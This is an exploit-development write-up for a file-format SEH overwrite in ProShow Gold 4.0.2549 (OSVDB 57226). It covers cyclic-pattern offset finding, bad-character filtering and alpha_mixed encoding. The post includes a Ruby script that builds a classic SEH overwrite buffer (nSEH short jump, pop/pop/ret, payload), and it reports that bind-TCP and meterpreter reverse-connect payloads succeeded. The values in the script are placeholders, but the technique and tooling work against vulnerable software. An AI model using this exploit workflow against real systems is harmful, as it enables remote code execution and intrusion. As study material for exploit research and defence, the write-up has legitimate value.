ProShow Gold 4.0.2549 PSH File Overflow – OSVDB 57226
Recently I decided to take a look at a vulnerability in ProShow Gold reported by BKIS and detailed in OSVDB 57226. Much of the hard work was already done: BKIS had released a PoC pointing out the trigger location. I quickly found that the easiest way to make this bug work reliably was to exploit it with an SEH overwrite.
I used Metasploit's ./pattern_create.rb to generate a cyclic pattern and find the offset to the first handler in the chain (the overwritten handler value shown in the debugger's SEH chain, fed to ./pattern_offset.rb, gives that offset; nSEH sits four bytes before it). Typing ./pattern_create.rb 6500 felt a little weird, but sometimes you just have to overwrite a lot of stuff. I then used ./pattern_create.rb again to measure the maximum payload size past the handler. In the module this is listed as 1000 bytes, but you could actually squeeze in a few more (if you're into writing exceptionally large custom shellcode).
After a few failed payloads, comparing what was delivered against what was sent showed that quite a few bytes were getting filtered. So I set the encoder to x86/alpha_mixed, which takes care of the payload issues for the most part. Two caveats: alpha_mixed needs a register pointing at the start of the shellcode (BufferRegister), otherwise it prepends a GetPC stub that is not itself alphanumeric; and the encoder only covers the payload, so the nSEH short jump and the pop/pop/ret address still have to avoid the filtered bytes on their own.
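To make the three measurements above concrete, here is an added example (my own code, not from the original post and not Metasploit's): a small re-implementation of the cyclic pattern that pattern_create.rb emits, the offset lookup that pattern_offset.rb does (accepting either the 4 ASCII bytes or the 8-hex-digit little-endian value a debugger shows in the SEH chain), a sent-versus-delivered bad-character check, and a builder that lays a classic SEH overwrite on top of those numbers and refuses SEH records containing filtered bytes. The handler offset 260, the handler value 0x37694136, the pop/pop/ret address 0x41424344, the bad-character list and the int3 payload are placeholders for illustration, not values from the ProShow bug.

```ruby
# Added example, not code from the original post or from Metasploit: a
# small re-implementation of the measurements the write-up relies on --
# cyclic pattern generation (what pattern_create.rb does), offset lookup
# (what pattern_offset.rb does), a sent-vs-delivered bad-character check --
# and a builder that lays a classic SEH overwrite on top of them.
# The offsets, the pop/pop/ret address, the bad characters and the payload
# below are placeholder assumptions, not values from the ProShow bug.

UPPER = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a
CYCLE = UPPER.length * LOWER.length * DIGIT.length * 3 # 20280 bytes per cycle

# Metasploit's scheme: "Aa0Aa1...Zz9". Every triple is upper/lower/digit,
# so any 4-byte window is unique within one 20280-byte cycle.
def pattern_create(length)
  full = String.new
  UPPER.each { |u| LOWER.each { |l| DIGIT.each { |d| full << u << l << d } } }
  (full * (length / CYCLE + 1))[0, length]
end

# Takes either the 4 ASCII bytes seen in memory or the 8-hex-digit value a
# debugger shows in the SEH chain (little-endian on x86, so the value is
# byte-reversed before the search). Returns the offset or nil.
def pattern_offset(value, length = CYCLE)
  needle = value.match?(/\A(0x)?\h{8}\z/) ? [value.sub(/\A0x/, '').to_i(16)].pack('V') : value.b
  pattern_create(length).index(needle)
end

# Every byte 0x01..0xff minus the ones already known to be filtered; place
# this after the handler, then dump what actually landed in memory.
def all_bytes_except(exclude = [])
  (0x01..0xff).reject { |b| exclude.include?(b) }.pack('C*')
end

# A dropped byte shifts everything behind it, so compare one byte at a time
# and stop at the first divergence. Returns [offset, byte] or nil; exclude
# that byte and resend until the whole buffer survives.
def first_bad_char(sent, delivered)
  sent.bytes.each_with_index do |b, i|
    return [i, b] if delivered.getbyte(i) != b
  end
  nil
end

# Classic SEH overwrite layout:
#   [junk up to nSEH][nSEH: jmp short +6][SEH: pop/pop/ret][payload]
# handler_offset is what pattern_offset returned for the overwritten
# handler; nSEH is the 4 bytes before it. The encoder only protects the
# payload, so the jump and the pop/pop/ret address are checked against the
# bad characters here, and the payload against the room past the handler.
def build_seh_buffer(handler_offset:, ppr_addr:, payload:, bad_chars: [], max_payload: 1000)
  raise "payload too large for the #{max_payload} bytes past the handler" if payload.bytesize > max_payload
  nseh = "\xeb\x06\x90\x90".b          # jmp short +6 skips over the SEH record
  seh  = [ppr_addr].pack('V')          # pop/pop/ret address, little-endian
  (nseh + seh).each_byte do |b|
    raise format('SEH record contains filtered byte 0x%02x', b) if bad_chars.include?(b)
  end
  buf = 'A'.b * (handler_offset - 4)   # junk up to nSEH
  buf << nseh << seh << payload.b
end

if $PROGRAM_NAME == __FILE__
  # Walk-through with placeholder numbers: crash with a 6500-byte pattern,
  # pretend the debugger showed 0x37694136 as the overwritten handler.
  off = pattern_offset('37694136', 6500)
  buf = build_seh_buffer(handler_offset: off, ppr_addr: 0x41424344,
                         payload: "\xcc".b * 8, bad_chars: [0x00, 0x0a])
  puts "handler offset #{off}, buffer #{buf.bytesize} bytes"
end
```

The workflow this mirrors is the one in the write-up: write pattern_create(6500) into the PSH file, crash, read the overwritten handler out of the SEH chain and hand it to pattern_offset; then put all_bytes_except after the handler, dump that region from the debugger and run first_bad_char until nothing diverges. Only then does build_seh_buffer have the numbers it needs, and it will still refuse a pop/pop/ret address whose bytes the parser filters, which no payload encoder can fix.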
Overall, this bug was a great example of a very straightforward SEH overwrite.
I tested bind-TCP and meterpreter reverse-connect payloads without issue. Enjoy.

